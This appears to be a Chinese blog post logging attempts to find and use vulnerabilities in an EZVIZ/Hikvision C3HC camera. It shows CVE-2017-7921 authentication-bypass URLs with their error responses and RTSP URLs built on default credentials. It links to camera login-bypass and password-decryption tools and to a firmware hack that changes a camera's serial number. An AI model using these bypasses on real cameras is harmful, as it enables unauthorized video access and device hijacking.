首页 > 其他分享 >海康萤石摄像头C3HC学习

海康萤石摄像头C3HC学习

时间:2023-10-24 12:12:14浏览次数:45  
标签:海康 C3HC https CVE com 摄像头 2021

title: 海康萤石摄像头C3HC学习
date: 2023-10-13 20:55:48
tags: [摄像头]
categories: 摄像头
CVE-2017-7921 海康威视(Hikvision)摄像头漏洞复现 https://www.cnblogs.com/yier-G/p/16632842.html CVE-2021-36260漏洞复现 https://blog.csdn.net/qq_50854662/article/details/128700889 复现源代码:https://github.com/Cuerz/CVE-2021-36260

确定摄像头所在的IP地址段

网线连接到同一个路由器下,查看到路由器里面的DHCP客户端给摄像头分配了IP:192.168.2.218

CVE-2017-7921

http://192.168.2.218/Security/users?auth=YWRtaW46MTEK
Access Error: 405 -- Method Not Allowed
Requested method GET not supported for URL: /Security/users

http://192.168.2.218/onvif-http/snapshot?auth=YWRtaW46MTEK
Access Error: 404 -- Not Found
Can't locate document: /onvif-http/snapshot

http://192.168.2.218/System/configurationFile?auth=YWRtaW46MTEK
Access Error: 405 -- Method Not Allowed
Requested method GET not supported for URL: /System/configurationFile

CVE-2021-36260

Put result

<!DOCTYPE html>
<html>

<head>
    <title>Document Error: Not Found</title>
</head>

<body>
    <h2>Access Error: 404 -- Not Found</h2>
    <p>Can't open document: /mnt/mmc01/webPage/bic/ssoService/v1/applyCT</p>
</body>

</html>

RTSP 弱密码

主码流

rtsp://admin:12345@IP:554/h264/ch1/main/av_stream
rtsp://admin:12345@IP:554/MPEG-4/ch1/main/av_stream

子码流

rtsp://admin:12345@IP/mpeg4/ch1/sub/av_stream
rtsp://admin:12345@IP/h264/ch1/sub/av_stream

杂七杂八的随笔

多个海康摄像头 桥接
求大佬解答:
当面积很大的情况下(比如多个足球场),多个网络WIFI摄像头通过互相之间的桥接的方式,串成特定的网络拓扑;然后通过某个摄像头联网(局域网)来让手机(或电脑)可以查看所有这些WIFI网络摄像头的画面(或者连接到nvr)
有这种方案吗?或者技术上是怎么实现的?

开启设备的AP热点
(AP的SSID为EZVIZ_XXXXXXXXX,其中XXXXXXXXX为设备序列号;
AP的默认密码为EZVIZ_YYYYYY,其中YYYYYY为设备的验证码)

用1接1的链接方式,将第一个摄像头(已接入WIFI互联网)的开启热点adhoc,
第二个摄像头链接第一个摄像头的热点,(组成小火车厢相连接的结构),通过第一个摄像头的网络连接到互联网,也开启热点Adhoc。
第三个摄像头链接到第二个摄像头的热点,以此类推
20231007 确定了方案图纸,等待拍照获取序列号和验证码
- 抓包
- 社会工程

  1. 大华 DahuaLoginBypass
    Chrome extension that uses vulnerability CVE-2021-33044 to log in to Dahua IP cameras and VTH/VTO (video intercom) devices without authentication.

For other device types (NVR/DVR/XVR, etc), there exists CVE-2021-33045 which cannot be exploited with an ordinary web browser.

These vulnerabilities are likely to be fixed in firmware released after Sept 2021.
https://github.com/bp2008/DahuaLoginBypass

  1. 海康威视摄像头密码找回非重置

Hikvision IPC config preview tool
Requirements:

  • Firmware must be 5.4.4 or lower.
  • LAN access to camera

Instructions

https://github.com/WormChickenWizard/hikvision-decrypter

One you obtain the configuration file, simply load it into the program, decrypt it, and save it.Then you can use a hex editor to search for the passwords. At some point, I would like to implement the ability to read and edit the database from inside of the program.

Reference:
https://ipcamtalk.com/threads/hikvision-backdoor-ip-camera.46486/

C3HC如何查看摄像头admin密码?
海康C3HC, 第一次或着重置后连接,会有修改admin为新密码的步骤:修改密码
请将默认加密密码修改为新的加密密码,默认密码为设备验证码(6位大写字母),你可以在设备标签上找到它。
新密码:
修改后,请牢记你的新密码,若密码丢失,将不能被找回,需重置设备恢复初始值,确定要修改?

  1. 思路:找海康摄像头漏洞,针对漏洞进行分析和利用
    CVE-2017-7921 海康威视(Hikvision)摄像头漏洞复现
    https://www.cnblogs.com/yier-G/p/16632842.html

     CVE-2017-7921复现(解密文件)
         https://blog.csdn.net/qq_41617034/article/details/117521734
    
     海康摄像头CVE-2021-36260漏洞复现
         https://blog.csdn.net/qq_50854662/article/details/128700889
         复现源代码:https://github.com/Cuerz/CVE-2021-36260
    

肯定能找到漏洞复现;可是我无法连接到摄像头的网络,导致无法通信的尴尬!?

疑问:
1. 激活摄像头以后,热点的密码就变为激活密码了吗?
2. 用网线连接后,可否找到IP?
3. C3HC是否有这个漏洞?可否下载configurationFile;

思路2,问问个人卖家;这样专业的实践知识有时Google很难及时收录。

得到确认:WIFI和AP热点模式是不可能同时开启的!
20231011 C3HC大概率有这两个漏洞:
搜索: C3HC 固件升级; 搜索结构还在固件版本V5.3.2 build 200312

如何解绑定手机号
拆下flash,上编程器,修改序列号和验证码即可
具体视频:9号-10号,看了视频,丢失了链接
萤石云摄像头固件修改,更换SN解绑手机,解邦教程
https://tieba.baidu.com/p/8197423399

海康威视CVE-2017-7921的一次实战利用
https://cn-sec.com/archives/1788403.html

标签:海康,C3HC,https,CVE,com,摄像头,2021
From: https://www.cnblogs.com/backuper/p/17784503.html

相关文章

  • 基于 SpringBoot+Hikvision SDK 远程查看配置海康网络摄像头配置
    写在前面工作中遇到,简单整理理解不足小伙伴帮忙指正对每个人而言,真正的职责只有一个:找到自我。然后在心中坚守其一生,全心全意,永不停息。所有其它的路都是不完整的,是人的逃避方式,是对大众理想的懦弱回归,是随波逐流,是对内心的恐惧——赫尔曼·黑塞《德米安》海康设备通过SDK查看......
  • 使用ffmpeg将opencv捕获的摄像头数据推流到本地rtsp器上
    首先,为什么使用opencv?答:方便对视频进行处理,各种深度学习网络就有了用物之地。具体流程参考的FFmpeg/opencv+C++实现直播拉流和直播推流(对视频帧进行处理)_c++ffmpeg拉流_酒神无忧的博客-CSDN博客,但是细节不同。简述一下流程:使用opencv从摄像头中读取数据。将cv::Mat转换为A......
  • qt读取摄像头
    Qt中实时调取摄像头(利用OpenCV)_opencv获取网络摄像头qt_Loading_create的博客-CSDN博客C++版本#include<opencv2/opencv.hpp>#include"mainwindow.h"usingnamespacestd;usingnamespacecv;#undefmainintmain(){Matimage;VideoCapturecap(0);//c......
  • 记录--h5调用手机摄像头踩坑
    这里给大家分享我在网上总结出来的一些知识,希望对大家有所帮助1.背景一般业务也很少接触摄像头,有也是现成的工具库扫个二维码。难得用一次,记录下踩坑。2.调用摄像头的方法2.1. input<!--调用相机--><inputtype="file"accept="image/*"capture="camera"><!--调用......
  • 海康摄像机&大华摄像机&DSS平台的RTSP流地址格式
    实时流海康: rtsp://[username]:[password]@[ip]:[port]/[codec]/[channel]/[subtype]/av_stream说明:username:用户名。例如admin。password:密码。例如12345。ip:为设备IP。例如192.0.0.64。port:端口号默认为554,若为默认可不填写。codec:有h264、MPEG-4、mpeg4这几......
  • 如何将海康、大华、TP等监控摄像头、硬盘录像机的监控视频集成到网页中无插件播放,实现
    方法介绍今天我们介绍一个开放的监控接入平台NTVGBS,可以轻松实现将监控摄像头或录像机的监控视频信号集成到网页或APP中,并提供云台控制、录像回看等高级功能。NTVGBS是一款非常规范好用的开放监控平台,平台支持GB28181国标、RTMP/RTSP直播推送和ONVIF等开放规范,如果您有摄像头或......
  • 车载摄像头CAM
        经纬恒润根据客户的需求定制开发配套摄像头产品,目前产品包括ADAS(AdvancedDrivingAssistantSystem,高级驾驶辅助系统)、驾驶员监控系统摄像头和以太网摄像头。 产品种类ADAS摄像头1-box/2-box系列DMS/OMS摄像头系列环视、后视和流媒体摄像头系列(规划中)产品优......
  • 水星 Mercury MIPC251C-4 网络摄像头 ONVIF 与 PTZ 云台控制
    概况最近在什么值得买上发现一款水星的网络摄像头,除了支持云台/夜视功能之外,还标明支持onvif协议.所以想着买来接入到HomeAssistat作为监控使用.可到手之后发现事情并没有那么简单,记录如下.接入HomeAssistant按照HA的文档 ONVIFCamera 接入无非就是配置文......
  • 智能安全帽-GPS定位摄像头视频语音通话功能设计方案
    智能安全帽是一种集成了多种传感器和通信模块的创新设备。它内部包含陀螺仪、高度传感器、脱帽传感器、心率传感器、4G/5G通讯、GNSS定位、可选环境传感器以及语音播报系统等。这些功能使得智能安全帽能够实现人员定位、脱帽检测、生命体征监测、一键呼救、跌落监测、电子围栏......
  • 海康PS码流分析
    背景:通过使用海康SDK和EHOME_SDK,可以回调得到海康摄像头的原始PS码流。对PS码流进行解析分包,能够得到H264/H265视频流和AAC/G711音频流。然后可以将音视频通过RTMP打包封装之后发送到流媒体平台zlmediakit。因此有必要对海康PS码流格式进行分析。1.海康PS码流:前面40位是海康私有......